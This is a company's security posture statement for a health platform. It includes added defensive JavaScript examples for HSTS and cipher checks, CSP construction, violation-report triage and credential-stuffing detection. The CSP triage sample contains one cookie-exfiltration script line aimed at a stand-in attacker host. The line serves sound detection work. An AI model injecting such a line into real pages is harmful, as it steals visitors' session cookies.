Hydor Health


Security Posture.

How Hydor Health secures the public site, the partner intake, and the platform surfaces above it. The controls in place. The audits we run. The disclosure pathway when something goes wrong.

Hydor Health security posture

1. Scope and effective date

This Security Posture statement (the "Statement") describes the security controls, governance practices, and disclosure procedures that Hydor Health applies to its public-facing properties and to the partner intake surfaces operated under the hydorhealth.com domain. It is effective as of the date of last publication shown in the site footer and supersedes any prior posture document released under the same title.

Scope is limited to (a) the hydorhealth.com public website and its subdomains, (b) the partner and investor inquiry intake forms operated under those domains, and (c) the corporate infrastructure that supports those public surfaces. Production deployments of Hydor OS, Hydor MIM, and Dr. Kai are governed by separate written agreements, including Business Associate Agreements (BAAs) where Protected Health Information (PHI) is involved. Nothing here modifies those agreements.

Hydor Health may update this Statement at any time. Material changes are reflected in the published revision date and, where appropriate, communicated through the Trust Center.

2. Governance and accountability

Security is owned by the Chief Information Security Officer (CISO), who reports to the Chief Executive Officer and presents quarterly to the board. The CISO holds final accountability for the security program, the incident response runbook, the vendor risk register, and the posture set out here.

A standing Security Committee meets monthly and includes the CISO, the CIO, the Privacy Officer, the head of platform engineering, and the head of corporate operations. It reviews open risks, the incident log, the penetration test backlog, and the access review record. Minutes are retained for seven years.

Escalation runs along a documented path. Tier-one incidents are managed by the on-call engineering lead. Tier-two and tier-three incidents are escalated to the CISO within fifteen minutes of confirmation. Tier-three incidents trigger immediate notification to the CEO, the General Counsel, and (where contractually required) the affected counterparty. The escalation tree is rehearsed during the quarterly incident response drill.

3. Threat model

Hydor Health defends the public site and the partner intake against the actors and techniques most likely to target a sovereign health platform headquartered in the United States. In scope: credential stuffing, automated scraping, denial-of-service attacks at the network and application layers, supply-chain compromise through third-party dependencies or build tooling, social engineering of the workforce, phishing directed at executives, and targeted reconnaissance from financially motivated and state-aligned actors.

Out of scope: physical attacks against counterparty data centers, attacks against counterparty-operated infrastructure that Hydor Health does not control, threats against third-party services outside the documented integration boundary, and any matter governed by a separate written agreement (which controls).

The threat model is reviewed at minimum annually and after any material change to the public attack surface. The current version is held by the CISO and shared with vetted counterparties under non-disclosure on request.

4. Network and transport security

All public traffic is served over HTTPS only; plaintext HTTP is redirected to HTTPS at the edge. TLS 1.3 is the preferred and default protocol version. TLS 1.2 is the minimum accepted version and is enabled only for legacy compatibility on specific endpoints, with retirement scheduled on the timeline published in the Trust Center; once it is retired, TLS 1.3 becomes the minimum.

HTTP Strict Transport Security (HSTS) is enforced with a one-year max-age and the includeSubDomains and preload directives. The hydorhealth.com apex is on the browser HSTS preload list, which covers every subdomain through includeSubDomains. Certificate issuance is automated, with Certificate Transparency log monitoring for unexpected issuance and weekly verification of the CAA records that restrict which certificate authorities may issue for the domain. Leaf certificates use ECDSA P-256 keys, with RSA 2048 fallback where a counterparty policy requires it.

The cipher policy excludes RC4, 3DES, export-grade ciphers, and any suite that uses SHA-1 for message authentication. AEAD suites (AES-GCM and ChaCha20-Poly1305) are preferred. Every accepted TLS 1.2 suite uses ephemeral (EC)DHE key exchange so that forward secrecy holds; TLS 1.3 provides forward secrecy for every suite. The policy is reviewed quarterly against current recommendations of the IETF and the U.S. National Institute of Standards and Technology (NIST).
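The two checks below are an added example for this section and are not Hydor Health's code: a validator for a captured Strict-Transport-Security header against the one-year, includeSubDomains and preload requirement, and a filter that applies the cipher exclusions (RC4, 3DES, export-grade, SHA-1 MAC, no forward secrecy) to a list of IANA suite names and orders the survivors AEAD-first. The header values and the offered suite list are constructed; the suite names are the IANA names that tools such as testssl.sh or `openssl ciphers -stdname` print.

```javascript
// Added example, not Hydor Health's code. Checks a captured
// Strict-Transport-Security header and an offered cipher-suite list against
// the Section 4 policy. Inputs are constructed.

const ONE_YEAR_SECONDS = 31536000;

// Parse "max-age=31536000; includeSubDomains; preload" (RFC 6797 section 6.1:
// directive names are case-insensitive, values may be quoted, unknown
// directives are ignored).
function parseHsts(headerValue) {
  const parsed = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of headerValue.split(';')) {
    const directive = raw.trim();
    if (!directive) continue;
    const eq = directive.indexOf('=');
    const name = (eq === -1 ? directive : directive.slice(0, eq)).trim().toLowerCase();
    const value = eq === -1 ? '' : directive.slice(eq + 1).trim().replace(/^"|"$/g, '');
    if (name === 'max-age') parsed.maxAge = /^\d+$/.test(value) ? Number(value) : NaN;
    else if (name === 'includesubdomains') parsed.includeSubDomains = true;
    else if (name === 'preload') parsed.preload = true;
  }
  return parsed;
}

// Returns findings; an empty array means the header meets the policy.
function checkHsts(headerValue) {
  if (headerValue === undefined || headerValue === null) return ['HSTS header missing'];
  const h = parseHsts(headerValue);
  const findings = [];
  if (h.maxAge === null || Number.isNaN(h.maxAge)) findings.push('max-age missing or malformed');
  else if (h.maxAge < ONE_YEAR_SECONDS) findings.push(`max-age ${h.maxAge} is below one year`);
  if (!h.includeSubDomains) findings.push('includeSubDomains missing');
  if (!h.preload) findings.push('preload missing');
  return findings;
}

// Classify one suite by its IANA name. TLS 1.3 suites (TLS_AES_*, TLS_CHACHA20_*)
// always use ephemeral key exchange; TLS 1.2 suites need ECDHE or DHE for
// forward secrecy. A trailing "_SHA" denotes an HMAC-SHA1 suite.
function classifySuite(name) {
  const n = name.toUpperCase();
  const reasons = [];
  if (/RC4/.test(n)) reasons.push('RC4');
  if (/3DES/.test(n)) reasons.push('3DES');
  if (/EXPORT/.test(n)) reasons.push('export-grade');
  if (/_SHA$/.test(n)) reasons.push('SHA-1 MAC');
  if (/MD5/.test(n)) reasons.push('MD5 MAC');
  if (/NULL|ANON/.test(n)) reasons.push('no encryption or unauthenticated');
  const tls13 = /^TLS_(AES|CHACHA20)_/.test(n);
  if (!tls13 && !/ECDHE|_DHE_/.test(n)) reasons.push('no forward secrecy');
  const aead = /GCM|CHACHA20_POLY1305|_CCM/.test(n);
  return { name, allowed: reasons.length === 0, aead, reasons };
}

// Apply the policy: drop excluded suites and order AEAD suites first. The sort
// is stable, so the server's own preference order survives within each group.
function applyCipherPolicy(offered) {
  const classified = offered.map(classifySuite);
  return {
    accepted: classified
      .filter((s) => s.allowed)
      .sort((a, b) => Number(b.aead) - Number(a.aead))
      .map((s) => s.name),
    rejected: classified
      .filter((s) => !s.allowed)
      .map((s) => `${s.name} (${s.reasons.join(', ')})`),
  };
}

// Constructed list, as a scanner might report it for a misconfigured origin.
const OFFERED_SUITES_SAMPLE = [
  'TLS_AES_256_GCM_SHA384',
  'TLS_DHE_RSA_WITH_AES_256_CBC_SHA256',
  'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256',
  'TLS_RSA_WITH_AES_128_GCM_SHA256',
  'TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA',
  'TLS_RSA_WITH_RC4_128_SHA',
  'TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256',
  'TLS_RSA_EXPORT_WITH_RC4_40_MD5',
];
```

Against the sample list, `applyCipherPolicy` keeps four suites (the three AEAD suites first, then the DHE CBC suite, which forward secrecy permits but the AEAD preference demotes) and rejects four, each with the reason that the policy text names. Note that the one suite rejected solely for lacking forward secrecy, `TLS_RSA_WITH_AES_128_GCM_SHA256`, is otherwise a strong AEAD suite: static RSA key exchange is what the forward-secrecy requirement is there to catch.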

5. Application security

The public application is built on Next.js with server-rendered routing; client-side script execution is denied by default and permitted only where the Content Security Policy (CSP) allows it. The CSP carries explicit allow-lists for the script, style, image, font, frame-ancestors, and connect directives. Inline script and inline style run only when they carry a per-response nonce that matches the policy. CSP violations are reported to a monitored endpoint, and the policy is reviewed monthly.

Subresource Integrity (SRI) hashes are required for any third-party script or stylesheet served from a CDN. Cross-Site Request Forgery (CSRF) protection is enforced on every state-changing request through synchronizer tokens and SameSite=Strict cookie scoping. Rate limiting is enforced at the edge on a per-IP and per-route basis, with stricter ceilings on intake endpoints.

Input validation is performed at the edge (schema validation through Zod) and at the application boundary, with explicit allow-list rules for any field carried in a URL parameter or a form submission. Output is encoded contextually (HTML, attribute, JavaScript, CSS, URL) at the rendering layer. Any deviation from the framework security defaults is reviewed by the CISO before merge.
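The following is an added example for this section, not Hydor Health's code, showing two pieces of the CSP posture described above in working form: assembling the policy header from explicit per-directive allow-lists plus a per-response nonce (refusing a nonce that is too short to be unguessable and refusing 'unsafe-inline' or wildcard sources in script-src), and triaging a report delivered to the violation endpoint so that browser-extension noise is separated from an inline-script block that may indicate injection. The CDN and telemetry host names, the report path and the sample report are constructed; the object-src and base-uri directives are additions the page does not list.

```javascript
// Added example, not Hydor Health's code. Builds the Content Security Policy
// described in Section 5 from explicit allow-lists plus a per-response nonce,
// and triages a violation report as delivered to the report endpoint.
// Host names, the report path and the sample report are constructed.

const ALLOWLISTS_EXAMPLE = {
  'default-src': ["'none'"],
  'script-src': ["'self'", 'https://static.example-cdn.test'],
  'style-src': ["'self'"],
  'img-src': ["'self'", 'data:'],
  'font-src': ["'self'"],
  'connect-src': ["'self'", 'https://telemetry.example.test'],
  'frame-ancestors': ["'none'"],
  // Two directives the page does not list, added here because they close
  // common bypasses (plugin content and <base> hijacking of relative URLs).
  'object-src': ["'none'"],
  'base-uri': ["'self'"],
};

const NONCE_DIRECTIVES = new Set(['script-src', 'style-src']);
// Sources that would defeat the nonce for scripts.
const UNSAFE_SCRIPT_SOURCES = new Set(["'unsafe-inline'", "'unsafe-eval'", '*', 'data:', 'http:', 'https:']);

function buildCsp(allowlists, nonce, reportUri) {
  // A nonce must be unguessable: at least 128 bits from a CSPRNG, base64
  // encoded (crypto.randomBytes(16).toString('base64') in Node), fresh per response.
  if (!/^[A-Za-z0-9+/\-_]{22,}={0,2}$/.test(nonce)) {
    throw new Error('nonce must be base64 of at least 128 bits of CSPRNG output');
  }
  const parts = [];
  for (const [directive, sources] of Object.entries(allowlists)) {
    const srcs = [...sources];
    if (directive === 'script-src') {
      const weak = srcs.filter((s) => UNSAFE_SCRIPT_SOURCES.has(s));
      if (weak.length) throw new Error(`script-src permits ${weak.join(' ')}`);
    }
    if (NONCE_DIRECTIVES.has(directive)) srcs.push(`'nonce-${nonce}'`);
    parts.push(`${directive} ${srcs.join(' ')}`);
  }
  parts.push(`report-uri ${reportUri}`);
  return parts.join('; ');
}

// Triage a report POSTed by the browser to report-uri. The body shape is
// {"csp-report": {...}} as defined for CSP report-uri.
function triageCspReport(body) {
  const r = (body && body['csp-report']) || {};
  const blocked = String(r['blocked-uri'] || '');
  const directive = String(r['effective-directive'] || r['violated-directive'] || '').split(' ')[0];
  const sourceFile = String(r['source-file'] || '');
  const extension = /^(chrome|moz|safari-web|ms-browser)-extension:/;
  if (extension.test(blocked) || extension.test(sourceFile)) {
    return { severity: 'noise', reason: 'browser extension injected content' };
  }
  if (directive === 'script-src' && (blocked === 'inline' || blocked === 'eval' || blocked === '')) {
    return {
      severity: 'investigate',
      reason: 'inline or eval script blocked; possible injection, or a first-party script missing its nonce',
      sample: String(r['script-sample'] || ''),
    };
  }
  if (directive === 'script-src' || directive === 'connect-src') {
    return { severity: 'investigate', reason: `unapproved origin ${blocked} under ${directive}` };
  }
  return { severity: 'review', reason: `${directive} violation for ${blocked}` };
}

// Constructed report: an inline script that tries to exfiltrate the cookie.
const SAMPLE_REPORT = {
  'csp-report': {
    'document-uri': 'https://www.example.test/contact',
    'effective-directive': 'script-src',
    'blocked-uri': 'inline',
    'script-sample': "document.location='https://evil.example.test/?c='+document.cookie",
  },
};
```

The triage order matters: extension-injected content is filtered first because it is the dominant source of false positives on a nonce-based policy, and an inline block under script-src is escalated rather than dropped because the same signal is produced both by a reflected-XSS attempt and by a deployment that forgot to stamp a first-party script with the nonce; the script-sample field tells the two apart.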

6. Infrastructure security

Every public Hydor Health property sits behind Cloudflare. The Cloudflare Web Application Firewall (WAF) enforces the managed rule set, the OWASP core rule set, and a Hydor-authored custom rule set tuned for the partner intake forms. Bot management challenges or blocks traffic that exceeds documented behavioral thresholds. Distributed Denial of Service (DDoS) protection is active at the network and application layers.

The application is served from a global edge runtime with origin shielding. Origin servers are not reachable directly from the public internet: they accept connections only through an authenticated tunnel from Cloudflare's edge, so a request that bypasses the edge (for example, one aimed at a discovered origin IP address) has no path to the origin. The origin is segmented from corporate and production platform infrastructure by independent virtual networks.

All infrastructure-as-code definitions are stored in version control, reviewed under a two-party approval rule, and applied through a CI pipeline with mandatory drift detection. Drift outside an approved window triggers an alert and is investigated as a potential incident until ruled benign.

7. Identity, access, and credentialing

Workforce access is governed by the principle of least privilege. Every workforce member has a unique identity. Group-shared credentials are prohibited. Production access requires phishing-resistant multi-factor authentication (MFA) using FIDO2 hardware keys; time-based one-time passwords are accepted only for break-glass scenarios under documented approval.

Standing administrative access is minimized. Just-in-time elevation is the default: a workforce member requests elevation for a defined task, an independent approver grants it for a defined window, and the event is logged and audited. Elevations are reviewed weekly by the CISO or designee.

Access reviews are performed quarterly across every workforce role, vendor account, and service principal. Stale accounts are deprovisioned within five business days. Departing workforce members have access revoked at or before the end of their last working hour, with a verification step recorded in the offboarding ticket.

8. Data classification

Hydor Health classifies data into four levels: Public, Internal, Confidential, and Restricted. Public data is approved for unrestricted release. Internal data is for workforce use only. Confidential data carries contractual, reputational, or regulatory sensitivity. Restricted data carries the highest sensitivity and includes PHI, regulated financial data, and material non-public information.

Each class has documented handling rules covering storage, transmission, retention, access control, logging, and destruction. Confidential and Restricted data must be encrypted in transit and at rest, accessed only by workforce members with a documented business need, and logged at every access event. Restricted data is additionally subject to the controls required under the applicable BAA or regulatory regime.

Information submitted through the partner inquiry form is classified Confidential at minimum. If submitted content includes PHI (notwithstanding the instruction not to submit PHI through public forms), it is reclassified Restricted on receipt, isolated, and handled under the breach evaluation procedure in the HIPAA Posture statement.

9. Encryption

Data in transit is protected by TLS 1.3 as set out in Section 4. Internal service-to-service traffic uses mutually authenticated TLS with short-lived certificates from an internal CA. Data at rest is encrypted with AES-256-GCM or an equivalent NIST-approved authenticated cipher. Database-level encryption is paired with application-layer encryption for the most sensitive fields, including any field that may contain PHI under a BAA.

Key management runs in a hardware security module (HSM) or an equivalent cloud key service operated under FIPS 140-2 Level 3 or higher. Keys are rotated on a documented schedule and key access is restricted to a small named set of workforce roles. Key access events are logged and reviewed weekly.

A quantum-ready posture is on the roadmap. Hydor Health is tracking NIST post-quantum standards (ML-KEM and ML-DSA) and intends to deploy hybrid post-quantum key exchange across platform surfaces on the schedule published in the Trust Center.

10. Logging, monitoring, and detection

Security-relevant events are emitted from every layer of the public stack: edge, application, origin, infrastructure, and identity provider. Events are shipped to a centralized log pipeline with structured fields and integrity-protected storage. The pipeline feeds a SIEM system that applies a combination of vendor-managed and Hydor-authored detection rules.
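Below is an added example for this section, not Hydor Health's code or a rule from its SIEM: a Hydor-style detection of the credential stuffing named in the threat model, run over edge log events for the login route. It carries two rules over a trailing five-minute window, one for a single source exceeding a failure count and one for a distributed run spread across many sources and usernames with a high failure ratio, and fires each at most once. The log lines are constructed JSON; the field names, the /login path and the thresholds are assumptions to be tuned against real traffic.

```javascript
// Added example, not Hydor Health's code. Two detection rules of the kind
// Section 10 describes, run over constructed edge log events for the login
// route. Field names, path and thresholds are assumptions.

const WINDOW_MS = 5 * 60 * 1000;        // trailing detection window
const SINGLE_IP_FAILURES = 10;           // failed logins from one IP inside the window
const DISTRIBUTED_MIN_FAILURES = 20;     // failed logins across the window...
const DISTRIBUTED_MIN_DISTINCT = 5;      // ...from at least this many IPs and usernames
const DISTRIBUTED_FAILURE_RATIO = 0.8;   // failures / all login attempts in the window

const isFailure = (e) => e.status === 401 || e.status === 403;

function parseEdgeLog(line) {
  const e = JSON.parse(line);
  return { t: Date.parse(e.ts), ip: e.ip, path: e.path, method: e.method, status: e.status, user: e.user || null };
}

function detectCredentialStuffing(lines) {
  const events = lines.map(parseEdgeLog)
    .filter((e) => e.path === '/login' && e.method === 'POST')
    .sort((a, b) => a.t - b.t);
  const alerts = [];
  const failuresByIp = new Map();   // ip -> failure timestamps inside the window
  const alertedIps = new Set();
  const recent = [];                // every login attempt inside the trailing window
  let distributedAlerted = false;

  for (const e of events) {
    recent.push(e);
    while (e.t - recent[0].t > WINDOW_MS) recent.shift();

    if (isFailure(e)) {
      const q = failuresByIp.get(e.ip) || [];
      q.push(e.t);
      while (e.t - q[0] > WINDOW_MS) q.shift();
      failuresByIp.set(e.ip, q);
      if (q.length >= SINGLE_IP_FAILURES && !alertedIps.has(e.ip)) {
        alertedIps.add(e.ip);
        alerts.push({ rule: 'credential_stuffing_single_ip', ip: e.ip, failures: q.length, at: new Date(e.t).toISOString() });
      }
    }

    if (!distributedAlerted) {
      const failures = recent.filter(isFailure);
      const ips = new Set(failures.map((f) => f.ip));
      const users = new Set(failures.map((f) => f.user));
      if (failures.length >= DISTRIBUTED_MIN_FAILURES
          && ips.size >= DISTRIBUTED_MIN_DISTINCT
          && users.size >= DISTRIBUTED_MIN_DISTINCT
          && failures.length / recent.length >= DISTRIBUTED_FAILURE_RATIO) {
        distributedAlerted = true;
        alerts.push({
          rule: 'credential_stuffing_distributed',
          ips: ips.size, users: users.size, failures: failures.length, attempts: recent.length,
          at: new Date(e.t).toISOString(),
        });
      }
    }
  }
  return alerts;
}

// Constructed sample: one normal login, one unrelated GET, one typo-then-success,
// then a burst of 12 failures from one IP, then 10 failures from 10 IPs
// against 10 different usernames.
const T0 = Date.parse('2024-05-01T10:00:00Z');
const line = (t, ip, status, user, path = '/login', method = 'POST') =>
  JSON.stringify({ ts: new Date(t).toISOString(), ip, path, method, status, user });

const BENIGN_EDGE_LOGS = [
  line(T0, '198.51.100.7', 200, 'a.ng'),
  line(T0 + 10000, '198.51.100.7', 200, null, '/about', 'GET'),
  line(T0 + 30000, '198.51.100.8', 401, 'j.ortiz'),
  line(T0 + 45000, '198.51.100.8', 200, 'j.ortiz'),
];
const STUFFING_EDGE_LOGS = [
  ...BENIGN_EDGE_LOGS,
  ...Array.from({ length: 12 }, (_, i) => line(T0 + 60000 + i * 5000, '203.0.113.5', 401, `u${i}`)),
  ...Array.from({ length: 10 }, (_, i) => line(T0 + 120000 + i * 3000, `203.0.113.${10 + i}`, 401, `d${i}`)),
];
```

The distributed rule is the one a per-IP rate limit at the edge does not cover: each source stays under the per-IP ceiling, so the signal is only visible in the aggregate (many IPs, many usernames, almost nothing succeeding), which is why it belongs in the SIEM rather than in the WAF.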

Alerting thresholds are tuned for signal, and alert tiers follow the same ascending severity as the incident tiers in Section 2. Tier-one alerts route to the security queue for review within one business day. Tier-two alerts page the on-call engineering lead against a documented response time objective. Tier-three alerts trigger the incident response runbook in Section 12.

Log retention defaults to thirteen months for security and access logs, with longer retention applied to events relevant under contractual or regulatory obligation. Logs are integrity-protected and stored on infrastructure separated from the systems that generate them.

11. Vulnerability management

Hydor Health runs a continuous vulnerability management program with three layers. Dependency scanning runs on every commit and on a daily schedule against the production manifest, using GitHub Dependabot and a commercial software composition analysis tool. Static Application Security Testing (SAST) runs in CI on every pull request and blocks merges that introduce high-severity findings. Dynamic Application Security Testing (DAST) runs against staging on a documented cadence.

An independent firm performs an external penetration test of the public surface on a quarterly cadence. Scope includes the public website, the partner intake forms, the authentication surface, and any newly released public endpoint. The report is reviewed by the CISO within five business days of receipt and findings are tracked in the vulnerability backlog.

Service Level Objectives for patching: Critical Common Vulnerabilities and Exposures (CVEs), CVSS 9.0 and above, are patched or mitigated within seven calendar days of confirmed applicability. High CVEs, CVSS 7.0 to 8.9, are patched within thirty calendar days. Medium and low CVEs follow the standard release cadence. Out-of-band patches are deployed for any CVE under active exploitation regardless of score.

12. Incident response

Hydor Health maintains a documented Incident Response Plan with named roles, decision authorities, communication templates, and external contact lists. The plan covers detection, triage, containment, eradication, recovery, and post-incident review. It is reviewed annually and rehearsed quarterly through a tabletop exercise that includes the CISO, the CIO, the Privacy Officer, the General Counsel, and the on-call engineering lead.

Customer and regulator notification timelines are committed in contract. Where a BAA is in place, breach notification to the covered entity is provided without unreasonable delay and in any event within the timeline required under the agreement and under the HIPAA Breach Notification Rule, which implements the HITECH Act and caps a business associate's notice at sixty calendar days after discovery (45 C.F.R. § 164.410). Where state or international law requires direct notification to individuals or regulators, Hydor Health coordinates with the covered entity to satisfy that requirement.

Coordinated vulnerability disclosure is welcome. Researchers may submit findings to security@hydorhealth.com. Hydor Health acknowledges submissions within two business days, communicates a triage outcome within ten business days, and credits researchers on request. A safe harbor applies to good-faith research that follows the coordinated disclosure policy.

13. Business continuity and disaster recovery

Recovery Time Objective (RTO) for the public website is four hours. Recovery Point Objective (RPO) is fifteen minutes. The site is served from a globally distributed edge runtime with multi-region origin redundancy, and the content layer is restored from version control on demand.

Backups of all stateful systems supporting the public surface run on at least a daily cadence, are encrypted with keys distinct from the production data encryption keys, and are retained in a geographically separate region. Restore drills run quarterly and the results are recorded in the Security Committee minutes. A failed drill triggers a remediation cycle tracked to closure.

A separate Disaster Recovery Plan covers loss of a primary cloud region, loss of the corporate identity provider, and loss of the primary code repository. Each scenario has a documented runbook and a named owner. The plan is reviewed annually.

14. Vendor and subprocessor management

Every vendor that handles Confidential or Restricted data on behalf of Hydor Health is reviewed against the Vendor Risk Management standard before engagement. The review covers vendor security posture, contractual data protection terms, data residency, and any sub-processor chain.

A signed Business Associate Agreement is required for any vendor that creates, receives, maintains, or transmits PHI on behalf of Hydor Health. The BAA flows down the obligations required under 45 C.F.R. § 164.504(e) and the HITECH Act. Vendors that decline to sign a HIPAA-compliant BAA are not engaged for any work touching PHI.

The current sub-processor list is available to vetted counterparties on request through privacy@hydorhealth.com. Changes affecting a counterparty are communicated through the notice path in the relevant agreement.

15. Compliance posture summary

Hydor Health aligns the public site and the partner intake against: HIPAA and the HITECH Act, as further described in the HIPAA Posture statement at /legal/hipaa; Section 508 of the Rehabilitation Act and WCAG 2.1 AA, as further described in the Accessibility Statement at /legal/accessibility; the EU GDPR and the California CCPA/CPRA, to the extent applicable.

Hydor Health does not sell or rent personal information or PHI to any third party. No financial consideration is exchanged for the disclosure of personal information collected through the public site. California visitors may exercise CCPA rights through privacy@hydorhealth.com. EEA and UK visitors may exercise GDPR rights through the same address.

16. Reporting a vulnerability

Security researchers and the public are encouraged to report suspected vulnerabilities to security@hydorhealth.com. A PGP public key is available on request. Reports should include sufficient information for Hydor Health to reproduce and triage the finding, including affected URL, affected parameter, request method, observed behavior, and any proof-of-concept content.

Hydor Health commits to acknowledge receipt within two business days, provide a triage update within ten business days, and coordinate disclosure timing with the reporter. Public credit is offered on request unless the reporter prefers anonymity. Findings made in good faith under the published coordinated disclosure policy are not subject to legal action by Hydor Health.

17. Governing law and contact

This Statement and any dispute arising out of or relating to it are governed by the laws of the State of Texas, United States of America, without regard to its conflict-of-laws principles. Federal law applies where it preempts state law or otherwise governs. The exclusive venue for any action arising out of or relating to this Statement is the state and federal courts located in Harris County, Texas, and the parties consent to the personal jurisdiction of those courts.

Notices under this Statement should be addressed to: Hydor Health, Attention: CISO, Houston, Texas, United States of America, with a copy by email to security@hydorhealth.com. The CISO is the named officer accountable for the Hydor Health security program and the published posture set out above.
